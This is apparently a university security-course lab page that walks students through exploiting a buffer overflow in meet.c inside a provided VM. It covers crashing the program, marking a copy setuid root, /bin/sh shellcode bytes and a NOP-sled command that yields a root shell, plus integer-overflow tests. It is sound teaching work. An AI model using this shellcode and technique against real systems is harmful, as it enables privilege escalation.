View All Pages

BuffOverflowDemo_details

VM images

VirtualBox

  • OVF:  https://pages.cs.wisc.edu/~chatterjee/classes/vms/Boxes2.ovf
  • Disk:  https://pages.cs.wisc.edu/~chatterjee/classes/vms/Boxes2-disk1.vmdk

VMware

  • Image: https://pages.cs.wisc.edu/~chatterjee/classes/vms/vmware-boxes-2.1.tar.bz2

 

SSH access

It might be easier to work on the VM over SSH from the guest --- easier to do copy-paste commands. I prefer to use SSH, but you are free to use the native VM environment or SSH. Here are some guidelines in case you want to use SSH.

 

You will have to enable Port forwarding to access VM from any terminal using SSH.

On the Virtual Box application window where VM is listed, right click VM listed and click Settings In Network Tab under Adapter 1, select “NAT” in 'Attached to' option Under Advanced, click forwarding which open a Window to set Port Forwarding option Add an entry there with following fields

 -------------------------------------------------------------------------------------------------
 |      Name          | Protocol |   Host IP  |Host Port             | Guest IP     | Guest Port |
 -------------------------------------------------------------------------------------------------
 |    SSH             |     TCP  |   0.0.0.0  | <Random Port > 1024> | <keep empty> |    22      |
 -------------------------------------------------------------------------------------------------

Example:

------------------------------------------------

| SSH       |    TCP    |    127.0.0.1   |    2222   |        | 22 |

----------------------------------------------

Save the settings and restart your Virtual Machine. Now SSH into the VM from terminal using the following command

            ssh -p 2222 user@127.0.0.1

You can also SCP files into VM using the following command

            scp -P 2222 file1 user@127.0.0.1:~/
I normally add these lines to my ssh config file ~/.ssh/config in the host machine.
Host vm
    Hostname localhost
    User user
    ServerAliveInterval 120
    Port 2222


And then you can do `ssh vm` or `scp vm`.

Tips for these VM images

  • The user account username/password: `user/user`
  • The root account username/password: `root/root`

 

(Removed below instruction which was conflicting or unnecessary.)

Code

Download sources files to a demo directory: https://pages.cs.wisc.edu/~chatterjee/classes/vms/demo.tar.gz

Run the following commands form your host machine shell.  (Make sure you have setup the SSH properly as stated above.)

Copy files _TO_ the VM:

  scp -P 2222 demo/* user@localhost:~/

Copy files _FROM_ the VM:

  scp -P 2222 user@localhost:~/* demo/
Or, even better mount the directory on your machine (if you have sshfs installed).
mkdir ~/demo_vm;  sshfs user@localhost: ~/demo_vm
Now, demo_vm is synced automatically between your host and the VM. For windows users you can look at https://github.com/billziss-gh/sshfs-win Links to an external site. for sshfs-win. 

 

Resources

This meet.c exploit demo is taken form Chapter 11 of the Ethicial Hacker's Handbook. See this document if you get stuck and need more information.

 

Test and crash meet

Build our source

On the VM, after you've copied these source files, compile the source code.

  gcc -o meet meet.c
  gcc -o get_sp get_sp.c
 

Test and break meet

$ ./meet rahul H@x0r
$ perl -e 'print "A"x200'
$ echo $(perl -e 'print "A"x200')
$ ./meet rahul $(perl -e 'print "A"x200')
$ ./meet rahul $(perl -e 'print "A"x500')

You may substitute your name for 'rahul' if you want to!

 

Control-flow hijack and previlege escalation for meet.c

Setup setuid super-meet

Make a copy of meet and mark setuid (remember root password is root).

  su root
  cp meet super-meet
  chown root:root super-meet
  chmod u+s super-meet
  exit

Generate shellcode

Be careful copy-pasting this command. Copy-pasting might introduce unintended line break characters.

perl -e 'print

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > shellcode

Check the length: shellcode should be 53. If not, something is wrong.  Maybe you accidentally added an unintended line break or some other character.

$ wc -c shellcode

Get the stack pointer

 $ ./get_sp

Check it twice! It shouldn't change.

 $ ./get_sp

Compute an approximate landing spot: ESP - 0x300

(In the lines below, substitute your own ESP values.)

Stack pointer (ESP): 0xbffff672 - 0x300 = 0xbffff372

Convert to little-endian: 0x72 0xf3 0xff 0xbf Use perl to print these 38 times

  perl -e 'print"\x72\xf3\xff\xbf"x38' > sp-repeat

Running the exploit

Run the exploit. Keep changing the size of the nop sled until you align the exploit properly on the stack. Try 200, 201, 202, ....

  ./meet rahul $(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)

If you get a shell (instead of Segfault, voila! 

Check super-meet, should be marked setuid

$ ls -l

Check your id, should be user(1000)

$ id

Run the exploit against super-meet. If you get a shell, check your uid using `id`.

  ./super-meet rahul "$(perl -e 'print "\x90"x200'; cat shellcode sp-repeat)"
Now you are root!!!

 

Test integer overflow vulnerability

$ gcc -o width width.c
$ ./width 5 "Hello there"
$ ./width 85 "Hello there"
$ ./width 65536 "Hello there"
 

Issues

If you find any problems with this demo: send me an email.